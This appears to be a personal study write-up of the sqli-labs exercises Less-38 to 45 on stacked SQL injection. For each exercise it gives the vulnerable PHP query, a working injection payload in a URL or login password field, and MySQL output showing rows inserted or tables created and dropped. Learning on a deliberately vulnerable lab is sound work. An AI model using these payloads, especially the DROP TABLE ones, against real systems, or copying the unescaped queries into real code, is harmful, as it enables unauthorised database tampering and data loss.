Sqli-labs Less38-45 Stacked Injection

This post records my process of learning SQL injection; the material used is SQLi

Less - 38: GET- Stacked Query Injection - String

  1. Source code

     $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    
  2. Test

     http://10.10.10.137/sqli-labs/Less-38/?id=1';insert into users(id,username,password) values ('38','less38','hello')-- 
    


     mysql> select * from users;
     +----+----------+------------+
     | id | username | password   |
     +----+----------+------------+
     |  1 | Dumb     | Dumb       | 
     |  2 | Angelina | I-kill-you | 
     |  3 | Dummy    | p@ssword   | 
     |  4 | secure   | crappy     | 
     |  5 | stupid   | stupidity  | 
     |  6 | superman | genious    | 
     |  7 | batman   | mob!le     | 
     |  8 | admin    | admin      | 
     |  9 | admin1   | admin1     | 
     | 10 | admin2   | admin2     | 
     | 11 | admin3   | admin3     | 
     | 12 | dhakkan  | dumbo      | 
     | 14 | admin4   | admin4     | 
     | 38 | less38   | hello      | 
     +----+----------+------------+
     14 rows in set (0.00 sec)
    

    A less38 user has been added.

Less - 39: GET - Stacked Query Injection - Integer based

  1. Source code

     $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

  2. Test

     http://10.10.10.137/sqli-labs/Less-39/?id=1;insert into users(id,username,password) values ('39','less39','hello')--+
    


     mysql> select * from users;
     +----+----------+------------+
     | id | username | password   |
     +----+----------+------------+
     |  1 | Dumb     | Dumb       | 
     |  2 | Angelina | I-kill-you | 
     |  3 | Dummy    | p@ssword   | 
     |  4 | secure   | crappy     | 
     |  5 | stupid   | stupidity  | 
     |  6 | superman | genious    | 
     |  7 | batman   | mob!le     | 
     |  8 | admin    | admin      | 
     |  9 | admin1   | admin1     | 
     | 10 | admin2   | admin2     | 
     | 11 | admin3   | admin3     | 
     | 12 | dhakkan  | dumbo      | 
     | 14 | admin4   | admin4     | 
     | 38 | less38   | hello      | 
     | 39 | less39   | hello      | 
     +----+----------+------------+
     15 rows in set (0.00 sec)
    

    The less39 user has been added.

Less - 40: GET - BLIND based - String - Stacked

  1. Source code

     $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    
  2. Test

     http://10.10.10.137/sqli-labs/Less-40/?id=1'); insert into users(id,username,password) values ('40','less40','hello')--+
    


     mysql> select * from users;
     +-----+----------+------------+
     | id  | username | password   |
     +-----+----------+------------+
     |   1 | Dumb     | Dumb       | 
     |   2 | Angelina | I-kill-you | 
     |   3 | Dummy    | p@ssword   | 
     |   4 | secure   | crappy     | 
     |   5 | stupid   | stupidity  | 
     |   6 | superman | genious    | 
     |   7 | batman   | mob!le     | 
     |   8 | admin    | admin      | 
     |   9 | admin1   | admin1     | 
     |  10 | admin2   | admin2     | 
     |  11 | admin3   | admin3     | 
     |  12 | dhakkan  | dumbo      | 
     |  14 | admin4   | admin4     | 
     |  38 | less38   | hello      | 
     |  39 | less39   | hello      | 
     | 109 | hello    | hello      | 
     |  40 | less40   | hello      | 
     +-----+----------+------------+
     17 rows in set (0.00 sec)
    

    The less40 user has been added.

Less - 41: GET - BLIND based - Intiger - Stacked

  1. Source code

     $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    
  2. Test (blind)

     http://10.10.10.137/sqli-labs/Less-41/?id=1; insert into users(id,username,password) values ('110','less41','hello')--+
    


     mysql> select * from users;
     +-----+----------+------------+
     | id  | username | password   |
     +-----+----------+------------+
     |   1 | Dumb     | Dumb       | 
     |   2 | Angelina | I-kill-you | 
     |   3 | Dummy    | p@ssword   | 
     |   4 | secure   | crappy     | 
     |   5 | stupid   | stupidity  | 
     |   6 | superman | genious    | 
     |   7 | batman   | mob!le     | 
     |   8 | admin    | admin      | 
     |   9 | admin1   | admin1     | 
     |  10 | admin2   | admin2     | 
     |  11 | admin3   | admin3     | 
     |  12 | dhakkan  | dumbo      | 
     |  14 | admin4   | admin4     | 
     |  38 | less38   | hello      | 
     |  39 | less39   | hello      | 
     | 109 | hello    | hello      | 
     |  40 | less40   | hello      | 
     | 110 | less41   | hello      | 
     +-----+----------+------------+
     18 rows in set (0.00 sec)
    

    The less41 user has been added.

Less - 43: POST - Error based - String - Stacked with twist

  1. Source code

     $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
     $password = $_POST["login_password"];
     $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
    
  2. Test

     username: admin
     password: c');create table less43 like users#
    

    After the test login:

     mysql> show tables;
     +--------------------+
     | Tables_in_security |
     +--------------------+
     | emails             | 
     | less43             | 
     | referers           | 
     | uagents            | 
     | users              | 
     +--------------------+
     5 rows in set (0.00 sec)
    
     username: admin
     password: c');drop table less43#
    

    After the test login:

     mysql> show tables;
     +--------------------+
     | Tables_in_security |
     +--------------------+
     | emails             | 
     | referers           | 
     | uagents            | 
     | users              | 
     +--------------------+
     4 rows in set (0.00 sec)
    

Less - 44: POST - Error based - String - Stacked - Blind

  1. Source code

     $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
     $password = $_POST["login_password"];
     $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

  2. Test (blind)

     username: admin
     password: a';insert into users(id,username,password) values ('144','less44','hello')#
    

    After the test login:

     mysql> select * from users;
     +-----+----------+------------+
     | id  | username | password   |
     +-----+----------+------------+
     |   1 | Dumb     | Dumb       | 
     |   2 | Angelina | I-kill-you | 
     |   3 | Dummy    | p@ssword   | 
     |   4 | secure   | crappy     | 
     |   5 | stupid   | stupidity  | 
     |   6 | superman | genious    | 
     |   7 | batman   | mob!le     | 
     |   8 | admin    | admin      | 
     |   9 | admin1   | admin1     | 
     |  10 | admin2   | admin2     | 
     |  11 | admin3   | admin3     | 
     |  12 | dhakkan  | dumbo      | 
     |  14 | admin4   | admin4     | 
     |  38 | less38   | hello      | 
     |  39 | less39   | hello      | 
     | 109 | hello    | hello      | 
     |  40 | less40   | hello      | 
     | 110 | less41   | hello      | 
     | 144 | less44   | hello      | 
     +-----+----------+------------+
     19 rows in set (0.00 sec)
    

Less - 45: POST - Error based - String - Stacked - Blind

  1. Source code

     $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
     $password = $_POST["login_password"];
     $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
    
  2. Test

     username: admin
     password: c');create table less45 like users#
    

    After the test login:

     mysql> show tables;
     +--------------------+
     | Tables_in_security |
     +--------------------+
     | emails             | 
     | less45             | 
     | referers           | 
     | uagents            | 
     | users              | 
     +--------------------+
     5 rows in set (0.00 sec)
    

    Test login:

     username: admin
     password: c');drop table less45#
    

    After the test:

     mysql> show tables;
     +--------------------+
     | Tables_in_security |
     +--------------------+
     | emails             | 
     | referers           | 
     | uagents            | 
     | users              | 
     +--------------------+
     4 rows in set (0.00 sec)
    
